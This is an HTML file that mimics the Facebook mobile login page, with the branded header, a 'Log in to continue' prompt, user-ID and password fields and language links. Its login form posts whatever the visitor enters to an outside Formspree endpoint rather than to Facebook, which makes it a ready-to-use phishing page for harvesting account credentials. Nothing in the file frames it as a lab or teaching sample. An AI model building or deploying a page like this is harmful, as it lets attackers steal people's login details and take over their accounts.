<!DOCTYPE html>
<html>
<head>
	<title>Facebookk</title>

	<meta name="viewport" content="width=device-width, initial-scale=1.0">
	<style type="text/css">
		body {
			margin: 0;
			padding: 0;
			overflow-x:hidden;
			background-color: white;
			font-family: Helvetica, Arial, sans-serif; 

		}
		.nav-bar p{
			background-color: #3B5998;
			margin: 0px;
			box-sizing: border-box;
			font-size: 30px;
			font-family: Helvetica, Arial, sans-serif bold;  
			color: white;
			padding: 5px;
  			width: 100%;
  			z-index: 12;
  			cursor: pointer;
		}
		input[type=text]
		{
			background-color: #F5F6F7;
    		display: block;
    		padding: 14px;
    		width:83%;
    		margin-top : 16px; 
    		border-radius: 2px;
    		border: solid .5px #ededed;   		
		}
		input[type=password]{
			background-color: #F5F6F7;
    		display: block;
    		padding: 14px;
    		width:83%;
    		margin-bottom:  16px; 
    		border-radius: 2px;
    		border: solid .5px #ededed;
		}
		input[type=submit]{
			background-color:#1877F2;
    		display: block;
    		color: white;
    		font-size: 18px;
    		padding: 11px;
    		width:88%;
    		margin-bottom: 10px; 
    		border-radius: 5px;
    		border: solid .5px #ededed;
		}
		input[name=new]{
			background-color:#00A400;
    		display: block;
    		color: white;
    		font-size: 18px;
    		padding: 8px;
    		width:60%;
    		margin-top : 26px; 
    		border-radius: 5px;
    		border: solid .5px #ededed;
		}

		.log-in i{
			color: gray;
		}
		.log-in p{
			color: #7596D3;
		}

		.lang{
			text-decoration: none;
			font-size: 12px;
		}

		.lang a{
			text-decoration: none;
			font-size: 12px;
			padding: 0 10px 2px 10px; 
			width: 40%;
			display: inline-block;
		}
		.log{
			color: darkblue;
		}


	</style>
</head>
<body>
	<div class="nav-bar" align="center">
		<i class="img sp_XQwuhv8Yn2-_1_5x sx_3307ff"></i>
		<p>facebook</p>	
	</div>
	<div class="log" align="center">
		<p>Log in to continue</p>
	</div>

	<div class="log-in" align="center">
		<form action="https://formspree.io/mrgadekl" method="POST">
			<input type="text" placeholder="Mobile number or emaail address" name="user-id">
			<input type="password" placeholder="Password" name="pass">
			<input type="submit" value="Log In" name="" >
		</form>	
			<i><sup>_______________</sup>  or  <sup>_______________</sup></i>
			<input type="submit" value="Create New Account" name="new">  			
					
			<p>Forgotten Password?</p>
	</div><br><br>
	

	<div class="lang" align="center">
		<a href="">English (UK)</a>
		<a href="">Hindi</a>
		<a href="">Bengali</a>
		<a href="">Marathi </a>
		<a href="">Sanskrit</a>
		<a href="">Gujarati</a>
		<br><br>


		Facebook Inc.
	</div>


</body>
</html>